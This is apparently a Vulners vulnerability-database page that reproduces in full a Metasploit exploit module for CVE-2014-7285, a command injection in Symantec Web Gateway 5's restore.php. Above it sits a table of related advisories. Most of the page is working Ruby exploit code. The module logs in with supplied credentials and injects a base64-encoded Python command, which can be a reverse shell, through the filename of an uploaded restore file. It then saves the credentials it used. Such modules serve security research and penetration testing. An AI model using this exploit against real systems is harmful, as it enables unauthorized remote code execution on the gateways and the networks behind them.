Vulners
Lucene search
Symantec Web Gateway 5 restore.php Command Injection
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | Symantec Web Gateway 5.2.1 OS Command Injection Vilnerability | 1 Jan 201500:00 | – | zdt |
| Symantec Web Gateway 5 restore.php Command Injection Exploit | 3 Mar 201500:00 | – | zdt |
 | CVE-2014-7285 | 4 Mar 201500:00 | – | circl |
 | Symantec Web Gateway OS Command Injection (CVE-2014-7285; CVE-2016-5313) | 25 Mar 201500:00 | – | checkpoint_advisories |
 | CVE-2014-7285 | 17 Dec 201416:00 | – | cve |
 | CVE-2014-7285 | 17 Dec 201416:00 | – | cvelist |
 | Symantec Web Gateway 5 - 'restore.php' (Authenticated) Command Injection (Metasploit) | 4 Mar 201500:00 | – | exploitdb |
 | Symantec Web Gateway 5 restore.php Post Authentication Command Injection | 27 Feb 201518:31 | – | metasploit |
 | CVE-2014-7285 | 17 Dec 201416:59 | – | nvd |
 | Symantec Web Gateway < 5.2.2 Command Injection Vulnerability | 18 Dec 201400:00 | – | openvas |
10
`##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway 5 restore.php Post Authentication Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Symantec Web
Gateway's setting restoration feature. The filename portion can be used to inject
system commands into a syscall function, and gain control under the context of
HTTP service.
For Symantec Web Gateway 5.1.1, you can exploit this vulnerability by any kind of user.
However, for version 5.2.1, you must be an administrator.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Egidio Romano', # Original discovery & assist of MSF module
'sinn3r'
],
'References' =>
[
[ 'CVE', '2014-7285' ],
[ 'OSVDB', '116009' ],
[ 'BID', '71620' ],
[ 'URL', 'http://karmainsecurity.com/KIS-2014-19' ],
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20141216_00']
],
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic python'
}
},
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'SSLVersion' => 'TLS1'
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Symantec Web Gateway 5', {}]
],
'Privileged' => false,
'DisclosureDate' => "Dec 16 2014", # Symantec security bulletin (Vendor notified on 8/10/2014)
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI to Symantec Web Gateway', '/']),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password for the username'])
], self.class)
end
def protocol
ssl ? 'https' : 'http'
end
def check
uri = target_uri.path
res = send_request_cgi({'uri' => normalize_uri(uri, 'spywall/login.php')})
if res && res.body.include?('Symantec Web Gateway')
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Safe
end
def get_sid
sid = ''
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/login.php'),
'method' => 'GET',
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while retrieving PHPSESSID')
end
cookies = res.get_cookies
sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
sid
end
def login(sid)
uri = target_uri.path
res = send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/login.php'),
'method' => 'POST',
'cookie' => sid,
'headers' => {
'Referer' => "#{protocol}://#{peer}/#{normalize_uri(uri, 'spywall/login.php')}"
},
'vars_post' => {
'USERNAME' => datastore['USERNAME'],
'PASSWORD' => datastore['PASSWORD'],
'loginBtn' => 'Login'
}
})
unless res
fail_with(Failure::Unknown, 'Connection timed out while attempting to login')
end
cookies = res.get_cookies
sid = cookies.scan(/(PHPSESSID=\w+);*/).flatten[0] || ''
if res.headers['Location'] =~ /executive_summary\.php$/ && !sid.blank?
# Successful login
return sid
else
# Failed login
fail_with(Failure::NoAccess, "Bad username or password: #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
end
end
def build_payload
# At of today (Feb 27 2015), there are only three payloads this module will support:
# * cmd/unix/generic
# * cmd/unix/reverse_python
# * cmd/unix/reverse_python_ssl
p = payload.encoded
case datastore['PAYLOAD']
when /cmd\/unix\/generic/
# Filter that one out, Mr. basename()
p = Rex::Text.encode_base64("import os ; os.system('#{Rex::Text.encode_base64(p)}'.decode('base64'))")
p = "python -c \"exec('#{p}'.decode('base64'))\""
else
p = p.gsub(/python -c "exec/, 'python -c \\"exec')
p = p.gsub(/decode\('base64'\)\)"/, "decode('base64'))\\\"")
end
p
end
def build_mime
p = build_payload
data = Rex::MIME::Message.new
data.add_part("#{Time.now.to_i}", nil, nil, 'form-data; name="posttime"')
data.add_part('maintenance', nil, nil, 'form-data; name="configuration"')
data.add_part('', 'application/octet-stream', nil, 'form-data; name="licenseFile"; filename=""')
data.add_part('24', nil, nil, 'form-data; name="raCloseInterval"')
data.add_part('', nil, nil, 'form-data; name="restore"')
data.add_part("#{Rex::Text.rand_text_alpha(4)}\n", 'text/plain', nil, "form-data; name=\"restore_file\"; filename=\"#{Rex::Text.rand_text_alpha(4)}.txt; #{p}\"")
data.add_part('Restore', nil, nil, 'form-data; name="restoreFile"')
data.add_part('0', nil, nil, 'form-data; name="event_horizon"')
data.add_part('0', nil, nil, 'form-data; name="max_events"')
data.add_part(Time.now.strftime("%m/%d/%Y"), nil, nil, 'form-data; name="cleanlogbefore"')
data.add_part('', nil, nil, 'form-data; name="testaddress"')
data.add_part('', nil, nil, 'form-data; name="pingaddress"')
data.add_part('and', nil, nil, 'form-data; name="capture_filter_op"')
data.add_part('', nil, nil, 'form-data; name="capture_filter"')
data
end
def inject_exec(sid)
uri = target_uri.path
mime = build_mime # Payload inside
send_request_cgi({
'uri' => normalize_uri(uri, 'spywall/restore.php'),
'method' => 'POST',
'cookie' => sid,
'data' => mime.to_s,
'ctype' => "multipart/form-data; boundary=#{mime.bound}",
'headers' => {
'Referer' => "#{protocol}://#{peer}#{normalize_uri(uri, 'spywall/mtceConfig.php')}"
}
})
end
def save_cred(username, password)
service_data = {
address: rhost,
port: rport,
service_name: protocol,
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def exploit
print_status("Getting the PHPSESSID...")
sid = get_sid
if sid.blank?
print_error("Failed to get the session ID. Cannot continue with the login.")
return
end
print_status("Attempting to log in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
sid = login(sid)
if sid.blank?
print_error("Failed to get the session ID from the login process. Cannot continue with the injection.")
return
else
# Good password, keep it
save_cred(datastore['USERNAME'], datastore['PASSWORD'])
end
print_status("Trying restore.php...")
inject_exec(sid)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2015 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.74024